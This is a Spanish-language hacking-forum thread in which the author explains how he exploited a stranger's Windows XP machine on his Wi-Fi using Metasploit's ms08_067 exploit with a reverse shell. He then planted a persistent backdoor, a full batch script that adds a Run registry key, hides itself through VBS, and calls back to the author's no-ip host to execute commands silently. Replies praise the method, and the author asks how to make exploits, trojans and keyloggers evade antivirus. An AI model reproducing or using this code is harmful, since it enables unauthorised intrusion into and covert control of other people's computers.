Tutorial > Crear backdoor con MSF

[/\/\Bull22]

Tutorial => Crear backdoor con MSF

Bueno, tengo un router Wifi y no me gusta esforzarme en protegerlo (solo tengo clave WEP) ya que de esa forma a veces tengo visitantes con los que aprender xD, y hoy se ha dado el caso.

A continuación voy a explicar el proceso que he seguido para crearme una backdoor al equipo que se ha conectado a mi red sin permiso para poder manejarlo cuando este conectado a otra red.

1 - Obtener shell remota con MSF

Bueno en este caso he utilizado el exploit: ms08_067_netapi que ya lleva integrado MSF, hago un breve repaso de su uso, aunque ya ahy muy buenos manuales por el foro.

(si a alguien le falta MSF o nmap)

Metasploit : http://www.metasploit.com/releases/framework-3.3.3.exe
Nmap : http://nmap.org/dist/nmap-5.00-setup.exe

>nmap 192.168.1.34 (esta es la IP que se le a asignado al equipo intruso)

si aparece

445/tcp open microsoft-ds podemos seguir, si no buscar otro exploit para usar y seguir el manual una vez tengais shell remota

>nmap -O (sistemas operativos vulnerables: XP (todos los SP)

>use windows/smb/ms08_067_netapi
>rhost 192.168.1.34
>lhost 192.168.1.33
>lport 4444
>set payload windows/shell/reverse_tcp
>exploit

2 - Crear backdoor

Bien ahora ya con la shell remota en nuestro equipo vamos a descargar un server TFTP, en este caso tftpd32 (http://tftpd32.jounin.net/download/tftpd32a.zip) solo son 38 kb xDD.

lo descomprimimos y en la misma carpeta donde tenemos el ejecutable (tftpd32.exe) guardamos el siguiente archivo batch (posteado por 3d1 hace un tiempo y modificado por mi)

Código:

@Echo off
if exist %windir%\lpq.vbs goto :installed
copy %0 "%windir%\lpq.bat"
echo set objshell = createobject ("wscript.shell"^)>%windir%\lpq.vbs
echo objshell.run "lpq.bat", vbhide>>%windir%\lpq.vbs
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v lpq /d %windir%\lpq.vbs
:installed
Set "IP=HOSTNOIP"
Set "INF= Remote Shell Domain:\\%UserDomain% User:%UserName%" PathShell: %CD%
Echo %INF%
(
Echo Set OBJ = CreateObject("WScript.Shell"^)
Echo OBJ.Run "Cmd /c" ^& Chr(34^) ^& WScript.Arguments(0^) ^& Chr(34^), VbHide
)>ShowWindow.vbs
:connect
LPQ -S %IP% -P "%INF%" >Batch.Cmd 2>&1
Set /p Error=<Batch.Cmd
If "%Error%" NEQ "Error: no ha habido respuesta de %IP%." (
Type Batch.cmd|Find /I /V "%INF%" >Batchs.Cmd
Del /Q /A Batch.cmd
Ren Batchs.cmd Batch.cmd
CScript //nologo ShowWindow.vbs "%~d0%~p0Batch.Cmd"
Ping -n 4 127.0.0.1 >nul 2>&1
)
Goto :connect

En el code reemplazamos:

HOSTNOIP - por un host que tenemos que crear en el servicio NO-IP (www.no-ip.com) si no tenemos aun ninguno xD.

Guardamos con el nombre que queramos, por ejemplo: server.bat y ahora abrimos el server TFTP y vamos a la shell remota y pones:

(siendo 192.168.1.33 nuestra dirección IP local)

>tftp -i 192.168.1.33 get server.bat server.bat
>start server.bat

Ahora tal y como ya se explica en el manual de 3d1 de donde he sacado el archivo batch original ahy que abrir la hyperterminal de windows (Inicio - ejecutar - hypertrm.exe) en la ventana "Descripcion de la conexión" ponemos como nombre cualquier cosa, pulsamos aceptar, en la ventana "Conectar a" ponemos:

Conectar usando: TCP/IP (Winsock)
Dirección del host: 0.0.0.0
Puerto 515

Pulsamos aceptar (aparecera "No se puede conectar a host 0.0.0.0 puerto 515", pulsamos aceptar y en el menu de arriba vamos a: Llamar - esperar una llamada, y en breve apareceran unas letras en la pantalla blanca indicando que ya tenemos acceso, y como se conecta a nosotros por NO-IP en vez de por IP local cuando se conecte desde otro sitio si abrimos el puerto 515 de nuestro router seguiremos teniendo acceso .

Se me olvidava en la hyperterminal para manejar su PC tenemos que crear archivos batch con lo que queramos que haga el otro equipo, y en la Hyperterminal vamos a: Transferir - enviar archivo de texto (en Tipo ponemos: todos los archivos) y buscamos el archivo batch, a continuación en el menu: Llamar, le damos a: Desconectar y se le ejecutara el archivo de forma oculta.

Esto es todo, cualquier duda, sugerencia, critica, etc... postear

se que ha sido mayormente una compilación de tecnicas usadas una detras de la otra, pero ya he dicho las fuentes asi que creo que esta todo correcto, SaluDOS.

[coredump]

Muy bueno 
Justo hacía un par de días estuve a punto de postear una pregunta sobre como hacer eso.

[messerschmitt]

Es más sencillo usar meterpreter para subir archivos, pero igual esta muy bien la ficha.

[Atry]

Valla, muy interesante

Gracias por la info 

[hacker225]

Cuanto tengamos la Shell Remota, vamos a descargar?, creo que se necesita de NirCMD o wget, o como lo descargamos desde la shell?

Como Descomprimimos desde la Shell?

Si solo tenemos la Shell Remota, como ponemos

(Inicio - ejecutar - hypertrm.exe) en la ventana "Descripcion de la conexión" ponemos como nombre cualquier cosa, pulsamos aceptar, en la ventana "Conectar a"

[trashhgoo]

Hmmm... Está bien, pero... No me gusta.
Prefiero el backdoor de meterpreter, mil veces, sin duda. Jaja.

Pero así me gusta, buscando trucos, pensando, innovando! Como debe ser!

[/\/\Bull22]

Cuanto tengamos la Shell Remota, vamos a descargar?, creo que se necesita de NirCMD o wget, o como lo descargamos desde la shell?

Como Descomprimimos desde la Shell?

Si solo tenemos la Shell Remota, como ponemos

- Desde la shell remota lo descargas usando el protocolo TFTP

- Y lo de inciio - ejecutar - hypertrm..... eso lo pones en tu equipo para controlar el otro una vez
este fuera de la LAN, no en el otro equipo.

saludos

Ah y aprovecho el post para preguntar sobre el tema de los av's, ayer estava enseñandole el "truco" a una amiga que tiene el kaspersky en su PC y cuando ejecute el exploit el av le aviso y bloqueo el intento de entrar, ahy alguna forma de saber si un exploit es detectado? a parte de probarlo por VM?

gracias, y al igual que los troyanos, keylogers, etc... se peuden hacer FU?

Ahora si esta todo, gracias.